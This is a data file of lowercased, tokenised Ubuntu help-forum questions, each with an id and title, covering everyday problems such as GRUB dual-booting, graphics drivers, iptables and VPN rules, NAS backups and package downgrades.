418337	chrome , zoom on some webpages takes up to 3 seconds	not sure how to put this . in chrome ( version 32 on 13.10 unity ) js heavy sites such as youtube and facebook lag when scrolled and when zoomed in/out . if page is dynamic ( adding new content to the page when you scroll to bottom ) scrolling is halted then is resumed . zooming on facebook/youtube takes up to 3 seconds to complete . once page is loaded , scrolling is ok ( unless something is being loaded ) . this is interesting , i have no other problems with graphics , i7 hd4000 , toshiba ultrabook with 6gb . firefox has similar scrolling lag , but less , and no zoom problem . i just wonder if there is something i need to do on ubuntu side . memory seems to be enough . my other 13.04 laptop with 16gb , has no problems . i tried changing different flags related to rendering in chrome , no change . i have adblock extension ( pausing it makes no difference ) . i had 13.04 on this laptop and similar problem persisted . ivy bridge support issues , using i915 ? unity dash opens up with slight hesitation , super+w window spread is instant and smooth . thank you .
418340	how to secure postfix on ubuntu server	i am setting up a new vps server with lemp . the only piece missing now is the mail server . do i need to do something special to make it secure ? or it is already secured when the installation is completed ? i think the right term is hardening postfix , does it make sense ?
418341	unable to detect windows 8 after installing ubuntu 12.04 lts after a dual boot	i have been trying this from yesterday . when i start the computer , windows 8 is not a option in the loader . i could see only linux generic , linux generic in recovery mode , memory test+ . running boot-repair did not work . i added the below lines to 40_custom file in the /etc/grub.d folder . menuentry `` windows 8 '' { set root= ' ( hd0,5 ) ' chainloader +1 } i wrote hd0,5 because sda5 has the windows os . below is the output from console for blkid : /dev/sda1 : uuid= '' 67322860-7e89-4e00-a114-3f0a5a153009 '' type= '' swap '' /dev/sda4 : label= '' winretools '' uuid= '' e036d0f536d0cda2 '' type= '' ntfs '' /dev/sda5 : label= '' os '' uuid= '' 8668d77568d7628b '' type= '' ntfs '' /dev/sda6 : uuid= '' 1dc84212-5127-4131-918b-f2118a2f8226 '' type= '' ext4 '' /dev/sda7 : label= '' new volume '' uuid= '' fa44b77844b7366b '' type= '' ntfs '' /dev/sda8 : label= '' pbr image '' uuid= '' 528a42f78a42d6df '' type= '' ntfs '' when i reboot the computer and select windows 8 option from the grub loader menu , it says that the boot configuration data for my pc is missing and shuts down after some time to restart . there is no /efi folder in my ubuntu machine . this might be because , before installing ubuntu , i hit f12 and changed the secure boot to off , and change the boot settings to legacy boot . please correct me if im wrong in the above process and let me know if any other information is needed . update : belows is my boot info : ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1026048 of the same hard drive for core.img . core.img is at this location and looks for ( , gpt6 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda2 : __________________________________________________________________________ file system : bios boot partition boot sector type : grub2 's core.img boot sector info : sda3 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda7 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda8 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 976,773,167 976,773,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 1,026,047 1,024,000 efi system partition /dev/sda2 1,026,048 1,107,967 81,920 bios boot partition /dev/sda3 1,107,968 1,370,111 262,144 microsoft reserved partition ( windows ) /dev/sda4 1,370,112 2,373,631 1,003,520 windows recovery environment ( windows ) /dev/sda5 2,373,632 254,842,879 252,469,248 data partition ( windows/linux ) /dev/sda6 254,842,880 336,971,775 82,128,896 data partition ( windows/linux ) /dev/sda7 336,973,824 951,371,775 614,397,952 data partition ( windows/linux ) /dev/sda8 951,373,824 976,771,119 25,397,296 windows recovery environment ( windows ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 67322860-7e89-4e00-a114-3f0a5a153009 swap /dev/sda4 e036d0f536d0cda2 ntfs winretools /dev/sda5 8668d77568d7628b ntfs os /dev/sda6 1dc84212-5127-4131-918b-f2118a2f8226 ext4 /dev/sda7 fa44b77844b7366b ntfs new volume /dev/sda8 528a42f78a42d6df ntfs pbr image ================================ mount points : ================================= device mount_point type options /dev/sda6 / ext4 ( rw , errors=remount-ro ) =========================== sda6/boot/grub/grub.cfg : ===========================
418342	a problem with remapping keys with xmodmap	i am trying to swap the ctrl and cmd keys on a mac keyboard . i 've read and applied this post and it works , but the moment i switch the focus of the current window to something else , it falls back to the original configuration . tried also putting it in the start-up applications -- did n't work . any ideas what goes wrong ?
418343	can not build monodevelop from source	whenever i try to install monodevelop it fails on the `` ./configure '' command . configure : error : can not enable gnome platform without gnome-sharp-2.0 i have installed mono 3.2 successfully into the /usr/opt directory . i have installed gnome sharp into the /opt/gtk directory . when i go to my monodevelop directory ( the place where the decompressed tarbal is ) and execute ./configure -- prefix= '' /opt/monodevelop it exist with the error above . i do in fact have the gnome sharp library installed . i got it from https : //github.com/mono/gnome-sharp and it should thus be up-to-date . i do want to note though , that the only files i can find inside the /opt/gtk seem to be gtk-related ; and as mono develop says it did find gtk-sharp but did n't find gnome-sharp , i 'm assuming they are different things . i am 100 % positive though i installed gnome-sharp and it was into the gtk directory . i installed gnome sharp with the following command sequence : ./configure -- prefix= '' /opt/gtk '' make sudo make install how do i make this work ? i do not want to install anything through a package manager like apt or aptitude .
418348	intel hd 4000 not detected	i have a new install of ubuntu 12.04 however my graphics card ( see above ) is not working properly , it looks like it is not detected . it was working perfectly on windows 8 however after the swap i am stumped . i am new to this so i do not know what information to give and what commands to use but can be supplied if you ask
418351	can no longer format flash drive	i have always been able to format my mp3 player by right clicking on it . presently when i right click on it , there is no such option . only eject or safely remove is present . i tried other devices and get the same result . any insight into this problem will be appreciated . ubuntu 12.04 64
418356	trust webcam on ubuntu 12.04	my trust wb-1400t webcam does not work on ubuntu 12.04 . i 've tried using cheese & skype but nothing seems working . can anyone help me on this please ? ? thank you in advance !
418357	how would i install ubuntu on a disk already containing windows 7 , not dual booting	could i just make a new drive partition and intall ubuntu there ? then just choose it on boot instead of windows ?
418359	intellij idea 13 ce on ubuntu 12.04 : native file watcher executable is outdated	when i start intellij i get the message native file watcher executable is outdated on the top right corner . i am using ubuntu 12.04 ( does not happen on my work laptop , with a more recent distro version ) . what is this exactly ? is there a way to fix it ?
418362	bluetooth not working on xubuntu 12.04.03 ( wifi/bt combo : qcwb335 )	since wifi was n't working at all with my fresh 12.04 , i ran the following to solve the not working wifi : sudo apt-get install linux-backports-modules-cw-3.8-precise-generic the problem is blueman device manager 1.23 is not discovering any bt device . here there is a description of the same problem .
418364	transmission wo n't go into overdrive	i am running the latest ubuntu 13.10 with all updates including latest version transmission . i have searched but nothing comes close . i have no settings in transmission . everything but open is greyed out . i ca n't set ports or test a port.i have gufw firewall and a router . could somebody please help ? i am a newbiee . how can i even get started with no settings to set ?
418366	how to control colour depth on open source amd driver	i have a laptop with an amd a10-5750m `` apu '' with integrated graphics , but also a separate radeon 8650g graphics chip . most of the time i will want to use the integrated graphics as i have little need for much more , but i might occasionally want to use the discrete graphics or even both at the same time . according to this wiki entry , such `` hybrid graphics '' control is is possible with the open source graphics driver and that appears to be the easiest way . when running the open source driver , if i look at system settings - > details - > graphics , it says the driver is gallium 0.4 on amd aruba , which i believe is the integrated graphics ( if using the fglrx driver it says radeon ) . however , if i run with the open source driver , the colour depth decreases , colour gradients in my photos are not smooth as they are with the fglrx driver . i found some instructions for increasing the colour depth to 24bit in another answer . in my 13.10 installation there was no /usr/share/x11/xorg.conf.d/10-monitor.conf file , so i created it , but it had no effect . does anybody know where i can set the colour depth ?
418368	how to limit users to n cores ?	i have an ssh server where users login to do various tasks . the problem is i have 4 cores , and one user is running tasks on 4 . how can i limit the number of cores any given user can use ? this is not a virtual machine . update : i was reading /etc/security/limits.conf and saw # * soft core 0 # root hard core 100000 # * hard rss 10000 # @ student hard nproc 20 # @ faculty soft nproc 20 # @ faculty hard nproc 50 # ftp hard nproc 0 # ftp - chroot /ftp # @ student - maxlogins 4 i tried setting this up so that a user is limited to 3 processes . but the user gets -bash : fork : retry : no child processes in their terminal . i have started looking into ulimit , and quota
418374	dark table install in ubuntu	try to install dark table entered in the terminal the info listed in the website and got msg check internet connection . it was connected tryed it again and same thing what am i doing wrong
418383	how do i connect to a printer shared via windows ?	i have a hp d2330 ( deskjet ) printer that is connected to a windows vista machine ( which i use as a print server ) . my windows pcs easily connect to it to print to a common printer . how do i connect my ubuntu 12.04 pc to the print server ?
418384	unity webapps not functioning in 13.10	i 'm running saucy salamander ( 13.10 ) , and it seems that not one of my web apps is working properly . most of them ( with the exception of google docs ) will integrate into my launcher , but when i launch them , they only open a separate , new window of chromium every time i attempt to launch them . additionally , there is no integration to my header , for example pandora does not show up in my sound menu . does anyone have any idea what 's going on ? i 've searched and searched but no one seems to be able to answer this question !
418386	how can i boot ubuntu from a usb drive on a windows xp computer ?	my computer is a microsoft windows xp media center edition 2005 . i followed the directions to create a bootable usb using the linux pendrive installer at ubuntu.com . i have tried editing the boot hierarchy to boot from usb first , but the computer simply boots with windows like normal . do you have any suggestions ? i simply want to use ubuntu without having to permanently install it .
418388	backup with rsync via smb	i have a netbook running lubuntu 13.10 and a windows pc running windows 7 home premium . i can copy the folders i want to backup from my lubuntu , go the folder named `` backup '' on my windows pc desktop by typing smb : //windows_pc_computer_name/users/username_on_windows_pc/desktop/backup in pcmanfm , and then simply paste , but i would like to use rsync . i read a post here but wonder if this is what i should do , and whether this will make my lubuntu vulnerable to any malicious files from the windows pc or the network . i wanted to check it here since i 'm a newbie and do n't want to mess with my lubuntu .
418389	chrubuntu install - disk space issue ? - acer chromebook c7	i have an acer chromebook with 320gb . i have installed it once with success but i keep seeing my 300 and something hd empty . my questions are : am i installing correctly ? am i using the 320 gb ? will i run out of space eventually ? can i claim that hd space to be use in ubuntu ?
418391	backing up from ubuntu computer to nas	my setup is a sony vaio laptop running ubuntu 13.10 and a buffalotech nas hard-wired to a netgear 6300 router . the question is about automating the task of accessing the nas from the laptop and backing up to it ( using rsync ) . i wrote a script which mounts the nas ' root `` share '' folder ( i.e . /share ) to the local mountpoint ... ./local_nas_share , as follows : sudo mount -t cifs //192.168.1.26/share /media/dan/local_nas_share -o username=admin , password=adminpsswrd and this operation works fine . btw , i have cifs-utils installed , but not samba . so the question is this : if i want to access the nas via a symbolic link , not via a static ip address ( as seen above in //192.168.1.26 ) , i believe that the best way to network the laptop with the nas is via samba . is that correct ? in other words , if i want to use a line such as //buffalonas/share ... instead of //192.168.1.26/share . i would have to install samba , which would map the nas ip address to a symbolic link and resolve it . maybe that 's not the only way of automating the backup task , but i am guessing that it 's one of the better approaches . am i right ? the reason for asking the question in the first place is because the nas ip is not really static ; it changes when the nas is powered down and restarted . so every time that happens , i have to look up its ip address and change the script , and it would be preferable to automate this task so that the script would not have to be modified . so i would like to know if samba is my best bet .
418395	days later , can not get ubuntu to work at all	and i apologize if this is a repetitive question . unfortunatly i have been trying for the past 2 days to run ubuntu . i 've never install/run an os from a usb or external hard drive before . i have a 168 gb external usb hard drive . i have downloaded ubuntu 13.10 three separate times , and have put it onto the drive using uui , yumi , and unetbootin for windows . none of these programs seems to produce a different result . the computer is a dell alienware ( i know i got ripped off ) running bios ao7 . i hit f12 while it is booting , and that takes me to the boot menu . from there i select the external hard drive that i have put the iso on . this leads to a black screen with a cursor for about 2 seconds , then windows 7 boots . i have tried setting the boot mode to legacy , and that just leads to the cursor blinking indefinitely and the computer being non responsive . thank you in advance for your time and any help or suggestions you may have .
418396	what is the difference between vi and vim ?	this might sound like an idiotic question . i would appreciate it if someone can let a newbie know what the differences are between `` vi '' and `` vim '' . i 've heard vim is a successor to vi but whenever i try to open vi in ubuntu it opens vim instead .
418397	how can i install ubuntu on an external hardrive from windows ?	i want to install ubuntu 12.04 on an external hard drive from windows 7 itself so that i can do other things while it is installing . the tutorials i saw on google tell me to first get it on a dvd and then install it on to the external hdd . is it possible to do a direct install instead ? how can i install ubuntu on an external hardrive from windows ?
418398	tear-free disabled in intel graphics , tearing in xubuntu	i use xubuntu 13.10 and have installed the intel graphics installer . i did it in order to reduce the amount of screen tearing with the vesa drivers earlier . but i see `` tear free '' as disabled , when i do : cat /var/log/xorg.0.log i can see tear free is disabled . i 'm putting in the line : [ 1718.525 ] ( ** ) intel ( 0 ) : `` tear free '' disabled how do i enable tear-free ? i have the 945gm graphics driver . any kind of help is appreciated .
418399	how do i install steam off a thumb drive	i have steam on a thumb drive and tried to find the installer but the location is unknown . i copied the files from windows and i can see the files but not the installer .
418400	does anyone know how to connect to network drives using scripts ?	i 've looked around , but i couldnât find anything that worked . i 'm trying to create a script that runs at startup which connects to my colleges network folder ( smb : //stuff/stuff ) . this script would also need my login information .
418402	ubuntu 13.10 speakers do not work on startup	i recently upgraded to ubuntu 13.10 , and my laptop 's internal speakers no longer play sound . i 've searched the internet numerous times and tried various things , but so far nothing has fixed the problem . i 've reloaded alsa , uninstalled and reinsatalled it along with pulse audio , with no luck . i then tried alsamixer and disabled auto-mut . this sometimes worked and sometimes did n't , but either way , the problem returned when i restarted my laptop . i 've also used hdajackretask . using this , i am able to get my speakers to work briefly by overriding the first option to internal speaker , but once the audio stops playing the problem returns . i also have to apply this every time i start up my laptop , even after clicking `` install boot override '' which i assumed would make the settings default . headphones work . and strangely , when i plug in headphones and unplug them , the speakers work . thanks in advance for your time .
418403	what do i need to get basic system audio on 12.04 lts ?	i have no system sounds and i can not listen to any audio from any thing like youtube videos , etc . i just need sound out of the system speaker .
418405	ubuntu 12.04 - no wireless networking capabilities in dell inspiron 3135	first let me say that i have been using ubuntu for about 2 years now and have developed a loyalty to this os ! however , this is my first time posting a question ... i just purchased a dell inspiron 3135 laptop a couple of days ago , and i successfully got ubuntu 12.04 lts loaded to the device . almost everything works perfectly - the only issue i have is my wireless capability ( and touchscreen interface , but i can live without that for now ) . i have no problem connecting via bluetooth to devices in my home . however , in order to access the internet i have to physically connect an ethernet cable . things iâve tried to no avail : downloading the proprietary driver from the dell website and installed it via the wireless network drivers application ( dell 's driver only supports win 8.1 , what a shock there ) re-installing ubuntu ( do n't know what i thought that would do ) if anyone has experience with this issue , slash can help me out here at all , your help would be much appreciated . thanks for your time , and peace & love from baltimore . -liam
418407	how do i create a .desktop file to launch eclipse ?	when i create a .desktop file to launch eclipse ( latest build with jdk 1.8 support ) i get the following error : a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run eclipse . no java virtual machine was found after searching the following locations : /home/dean/bin/eclipse-standard-luna-m5-linux-gtk-x86_64/eclipse/jre/bin/java java in your current path why does it try to find the jre under the directory where the eclipse binary is ? i can launch eclipse from the command line , and i can pin it to the launcher and it works . why is the .desktop file so confused about what it is supposed to do ? here is my .desktop file : [ desktop entry ] version=1.0 name=eclipse jdk 1.8 comment=eclipse exec=/home/dean/bin/eclipse-standard-luna-m5-linux-gtk-x86_64/eclipse/eclipse icon=/home/dean/bin/eclipse-standard-luna-m5-linux-gtk-x86_64/eclipse/icon.xpm terminal=false type=application categories=utility ; application ; the problem i 'm having is not what was asked in the question linked above as a duplice . my issue is because my path to the jdk is set in my .bashrc .
418410	sda1 ( file system ) remounted on every boot	i noticed a considerable slow down in my boot time . i run dmesg and i see that sda1 is remounted each time . this alone takes 23 secs of boot process.. any solution ? [ 5.302098 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 28.074981 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro
418411	is it possible to restrict phoronix test suite in ubuntu server 12.04 ( precise pangoline ) to give a specific test result ?	i would like to run a benchmarking test in ubuntu server 12.04 with phoronix test suite . i want to specifically measure cpu usage , memory usage , disk usage and network throughput . please help me . thanks .
418414	how to make the terminal autoclose when a command runs successfully ?	i want to make the terminal autoclose when a command runs successfully . it should n't autoclose if the command produces some error . for example : if i run sudo apt-get install vlc , the terminal should be closed automatically if the vlc package installs successfully . otherwise , it should n't close .
418417	pypar2 pops up when i try to run eclipse . please help	i have downloaded the adt-bundle for linux and extracted it . moved the extracted folder in `` android '' directory in my /home directory . i have also installed openjdk 6 . so when i try to run eclipse , pypar2 window pops up and i just do n't understand how do i run eclipse . if i uninstall pypar2 , it says 'could not display `` /home/siddhartharao17/androi ... 20131030/eclipse/eclipse '' . ' there is no application installed for executable files . do you want to search for application to open this file ? please help me ! !
418420	ca n't boot windows 8.1 after installing ubuntu	http : //paste.ubuntu.com/6901378/ here is how my boot looks like can someone help me please i have tried boot repair auto repair but it did n't fix the issue . i 'm kinda of a windows guy and do n't have that much of knowledge in linux zone
418422	linux server 12.04.2 - install msi geforce gt610 - for use with gpu in boinc	i have a problem . it has really become a problem . i run several ubuntu server 12.04 computers as webservers , mail servers etc . and then i 'm running some 6-8 computers with boinc ( seti/asteroid ) . i just started building a new computer , which has a newer technology , so that the gpu will be used by boinc as well . please notice , i 'm not using any kind of graphical interface . what i need some help with , is how to install the driver for the msi geforce gt610 2gb graphic card so that the gpu will run in boinc . i ave been writing with 10 different people around the world and tried almost everything . i will insert some links at the bottom of this post , just in case someone would like to know , just how much work i have been doing ; ) please help me install the linux driver on ubuntu server 12.04.2 for use with msi geforce gt610 2gb . please notice , that almost everybody who has an idea how to do this , is using the graphical edition , the ubuntu desktop 12.04 . links to discussions : discussion/thread 1 in the boinc forum discussion/thread 2 in the boinc forum i will be forever grateful if someone can fix this issue ; )
418423	how to fix overlapping text on some pages while using chrome ?	similar to this question : why is the font spacing on some websites broken ? i am using ubuntu 13.10 with google chrome and i 'm experiencing an issue where some webpages have overlapping text . the text will overlap horizontally , not vertically , and can sometimes be fixed by moving the mouse over the text . i tried to fix it the same way the other question was fixed , but i do n't have a /home/.fonts/ directory .
418425	ubuntu 12.04 missing close , minimize and maximize button after update and upgrade	i just do update and upgrade , but i miss close , minimize and maximize button along with top border title bar after that . i did metacity -- replace and unity -- reset , it did n't work for me . also , i set in the gconf-editor default metacity > general to close , minimize , maximize : and it did n't work . the last , i unchecked windows decoration in compiz , and it did n't work too . any help will be highly appreciated , and i attach a screenshot of a window without the title bar as one example of my problem .
418426	configure iptables for l2tp/ipsec vpn	i 've been trying to get my server running a vpn so that i can connect to blocked sites in china while i 'm traveling , but am having a few problems with iptables . my connection works fine if i flush my rules , but as soon as i restore them it does n't work so i know that i 'm blocking it somewhere , just no idea where . this is my iptable at the moment : chain input ( policy accept ) target prot opt source destination accept all -- anywhere anywhere reject all -- anywhere 127.0.0.0/8 reject-with icmp-port-unreachable accept all -- anywhere anywhere state related , established accept tcp -- anywhere anywhere tcp dpt : http accept tcp -- anywhere anywhere tcp dpt : https accept tcp -- anywhere anywhere tcp dpt:8888 accept tcp -- anywhere anywhere state new tcp dpt : ssh accept icmp -- anywhere anywhere log all -- anywhere anywhere limit : avg 5/min burst 5 log level debug prefix `` iptables denied : `` drop all -- anywhere anywhere accept udp -- anywhere sudosu.co udp dpt : isakmp accept esp -- anywhere anywhere accept udp -- anywhere sudosu.co udp dpt:4500 chain forward ( policy accept ) target prot opt source destination drop all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination accept all -- anywhere anywhere from what i can tell , i should be allowing udp 500 and 4500 but it 's not working .
418429	huwawei e173 usb dongle to user internet and send sms ( mandatory )	i use a pre paid internet connection . to activate and deactivate packages i need to to the same using sms . i understand i can just plug in the dongle and connect to the internet using the ubuntu wireless connection manager . but i can not send sms . i used to be able to do this in windows and i jurst shifted from windows to ubuntu so i am a newbie . in windows i had mobile partner but i can not find it to ubuntu . should i `` need '' to find one ? cant i send/receive sms using a different software ? or is it the best to activate/deactivate my connection and send sms using the mobile partner software for linux ? where can i find it ?
418432	installing media codecs without internet conncetion	i have a dual boot system with windows 7 and ubuntu installed i want to install the multimedia codecs but i do not have an internet connection in ubuntu but i do have a connection in windows , is there a way ?
418434	audio not running in fbr file	i have ubuntu 12.04 lts and for running fbr files i have installed wine application for installing fbr bluebery player but now i am facing another problem that audio is not playing and only the vido is playing . please help me about this issue ... ..why audio is not running with fbr files ...
418437	why cant i update my repository updates in 12.04 ?	i tried to install updates via the update manager , so then i used terminal an got dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : field name `../../../../java-7-openjdk-common/jre/lib/ext/sunjce_provider.jar ' must be followed by colon e : sub-process /usr/bin/dpkg returned an error code ( 2 ) so if anyone could help me i would appreciate that thank you
418439	usb keyboard still does n't work in server installer	i 've had a problem with the ubuntu server installer for a number of versions now . usb keyboards just do n't work in it with usb legacy enabled . i suspect it works with legacy disabled , but i ca n't get that far since grub does n't work with legacy disabled so i ca n't get in to the installer . has anyone been able to work around this ? it 's not a problem with the keyboards or the computers . multiple keyboards , multiple machines , multiple versions of server installer all exhibit the same behavior . centos 's installer works fine with legacy enabled , so it 's something specific to ubuntu 's server installer .
418453	why is the name of the minimized app not shown while using the numix theme in lubuntu ?	i loved the numix theme and i installed it in lubuntu 13.10 and now , when i apply it , it does not show the name of the minimized app . it does not even has option to edit !
418454	how to install mars [ radeon hd 8730m ] drivers ? is it supported ?	i bought dell inspiron 15r -5521 with i7-750gb hdd-8gb ram . abutareq @ p-box : ~ $ sudo lshw -businfo | grep -i display pci @ 0000:01:00.0 display mars [ radeon hd 8730m ] pci @ 0000:00:02.0 display 3rd gen core processor graphics controller steam keeps telling me when i change the display that i have only 250 mb video memory . i removed windows and installed ubuntu 13.10 because i want to use windows on vmware and i read about enabling 3d in vm but my device does not support 3d , that 's what vmware says .
418460	changed a look of windows	the look of my windows changed . i did n't do anything . the close , minimise and maximise buttons are on the right side of the windows . how can i change look to normal again ? i tried this , and it did n't work . here 's a screenshot :
418461	deluge will not launch , help !	my deluge is not launching . i have been using it for months with no issues ... i thought to just install another version of it .. when i attempt to it says `` this link needs to be opened with an app '' . no idea what to use to open it , or if i even have anything appropriate . i would prefer to just troubleshoot the issue with the deluge i already have , however i imagine im going to be pretty useless not being able to open a link to download ... so yea . ... new to ubuntu , have n't really installed much of anything on it . . . obviously . help would be greatly appreciated .
418462	xubuntu : weird boot screen and errors after reboot	i have installed xubuntu and tried to install playonlinux to be able to install itunes ( for the itunes store mostly ) . and to be able to play c & c tiberian dawn ( cncnet.org ) when i boot , the only thing is see is this : https : //db.tt/uo13va54 / https : //www.dropbox.com/s/ts31wgp6wwgrica/img_20140209_130644.jpg after i reboot 1 or 2 times , i get the normal login screen from xubuntu , but after that , i only get error reports . synaptic can not load normally , update management does not load . images of the errors : https : //db.tt/id0g3q9b https : //db.tt/citv6qni https : //db.tt/mt7etode https : //db.tt/kd7fnwvh i know the only think i did the last time , was changing the update mirror . i have not changed anything else , as far as i know . how can i fix this ? edit : i found out that i could n't shut down or reboot . just sign out . i just booted again and now i directly came into the login screen from xubuntu
418465	ca n't get wifi-direct to work , using wpa_supplicant	so , i wanted to have wifi direct on my laptop so i followed the instructions on this askubuntu post to compile and install wpa-supplicant 2.1 . when i run wpa_supplicant as advised in kernel.org it works fine and gives no errors . also the command sudo iw list shows that my wireless card supports wifi direct . but there is a problem : the p2p_find command in wpa_cli gives a fail . i noticed that there is another instance of wpa_supplicant running with different parameters and wpa_cli connects to that and not the one i launched ( as root of course ) . if i stop the annoying process ( second one in the picture ) , wpa_cli says it ca n't connect to wpa_supplicant . is this caused by the repository installed wpa_supplicant 1.0 ? any ideas about how to fix this ?
418466	installing ubuntu on hp laptop 2231 tx	i have a hp pavilion g6 2231tx notebook with me and it comes with default windows 8 . but now i need to change the os to ubuntu and will i have to face some problem if i do so.one of my friend told me that there is some uefi problems , can anyone please help me to clear my doubt
418468	dell latitude d830 driver questions	a friend of my asked me to put ubuntu 12.04 lts onto his old dell latitude d830 laptop . i installed the os but i have a few problems . i have no idea how to install the graphic drivers and set it up so that it auto updates every time the os is updated , nvidia quadro nvm 140m . i have no idea how to get the wireless card built into the laptop working properly . i have no idea where i could get a similar linux driver for this device . can someone help me out ?
418469	block ping from a particular ip address	my server is ubuntu 12.04 : - > ip 192.168.56.100 i have a client ubuntu 13.04 : - > ip 192.168.56.101 i have to block the ping from client to server so i wrote the iptable rule . iptables -a input -i eth0 -p icmp -s 192.168.56.101 -j drop now client ca n't ping to the server that part is fine , but server ca n't ping to client which should not be happening . before adding this rule both the server and client could ping each other . please tell me what am i missing here ... answers given are correct but how does it works ... . ? ? ? adding -- icmp-type echo-request does resolve the issue but this rule is being added to the input chain rules , so how can this rule anyway mess with the output chain , as it 's blocking the ping to client .
418472	changing my default bittorrent ?	my deluge would not launch . i uninstalled it thinking that another one of my programs , i.e . . transmission , ktorrent would start opening my magnet links . i did not change my default program for opening these files , basically because i did not know how to . can someone please assist me in doing so ? please , i am very new to ubuntu and my friend who had installed the system on my computer is actually in prison.. so i have no hopes of him guiding me through these issues . i am very lost .
418478	unable to ping/access internet through wired connection ( ubuntu 12.04 server )	i have a ubuntu server in my work and have a big network there are more than 100 computers . i installed an apache in the server and make ip is static . but when i want to update or install any programm , there are errors appear . also when i use ping command the result is : ping : unknown host www.google.com i do n't know what is the problem is ================================ i 'm trying to access to internet by using ping command and update but i can not do as there are some errors which can be seen in below images ; my dns servers are as follows ; 8.8.8.8 # primary server 8.8.4.4 # alternate/secondary server
418479	ubuntu is extremely slow 15 min after boot	i 'm booting ubuntu . after boot i 'm opening firefox , opera and thunderbird . now my system is for 15 minutes virtually unusable , before it will digest everything . i have 8gb of ram , and can not remember when that all started , but i 'm pretty sure this was n't always the case . i tried bootchart but it shows like only 95 seconds of whole boot which means that slowdown happens after boot . i remember that i was trying to localize a process that would take too much cpu/memory when slowdown happens but could n't find any . just looking at top now and it looks like `` ubuntuone-syncd '' eats 80 % of cpu , why on earth is that . however everything seems to work normal already regardless of that , and i think it was n't the case during slowdown when i was looking at top before . nonetheless it is the most cpu hungry process i have , i think . any ideas how can i target the cause ? i have ubuntu 12.04 64-bit .
418482	maas , juju help : maas nodes have no access to the internet while pxe booting	we are trying to implement a cloud setup in our college using maas/juju/openstack . the college has its own dhcp server and we do n't have access to that . so , we ca n't set next-server to our maas server . the problem of booting the nodes was solved by getting our own switch and allowing maas server to run dhcp . since there is only one nic , when we connect our machines to the switch , we have no access to the internet . so , here 's what we 've done till now . installed maas on a machine along with dhcp/dns . added the mac addresses of three other machines through maas web interface . pxe booted the other machines . although the nodes do pxe boot , they are unable to download the packages as they are no longer connected to the internet . so , the os components are not installed . the maas server however sets the nodes to 'ready ' and i can bootstrap juju on it . what is a work around for this ? we ca n't get nics for all the machines although getting one for the master server is possible . thank you .
418483	mount windows disk after error mounting	i ca n't mount the windows disk . i am a new linux user . error mounting /dev/sda1 at /media/dimitris/ce061fb2061f9b13 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/dimitris/ce061fb2061f9b13 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount /dev/sda1 : operation not permitted : the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
418484	external usb 3 hdd not recognized after new install	i have a macbook pro ( 2013 ) with lots of ram and used an install dvd to perform a clean install on a toshiba 1 tb usb 3 portable hdd ( hereafter called thdd ) the install of ubuntu 12 , downloaded just two weeks ago , proceeded smoothly . when asked to press the enter key to reboot the macbook pro i did so , but the thdd is not recognized . when pressing the option key the only disk that shows up is the internal hdd or any other externals i may have attached with other os 's not the thdd when i install mac os x on the thdd it works no problem , but wipe the thdd and install ubuntu and it is n't recognized ... help please note i have no other linux drives i can use to boot into .
418486	what can i do with terminal ?	i recently installed ubuntu just to change things up from my typical windows , but every one always talks about the magic you can work with the terminal , and how great the terminal is . what , exactly , can i do with the terminal and what are some basic commands i should start researching ?
418487	how to downgrade to a specific ppa version of libreoffice ?	since 2012 i have been using libreoffice provided by this ppa . but yesterday , i made an upgrade which contains a bug that messes with all my sheets . while i wait for a fix , i want to downgrade from the current version 4.2.0.4 to the previous version 4.2.0.3 . i 've found several articles to downgrade from the ppa to `` default '' version 3.6 but none that downgrade to a specific ppa version : how to `` properly '' downgrade libreoffice versions installed libreoffice 4 with ppa , how do i remove it and go back to libreoffice 3 ? is it possible to do a version downgrade using standard apt commands ?
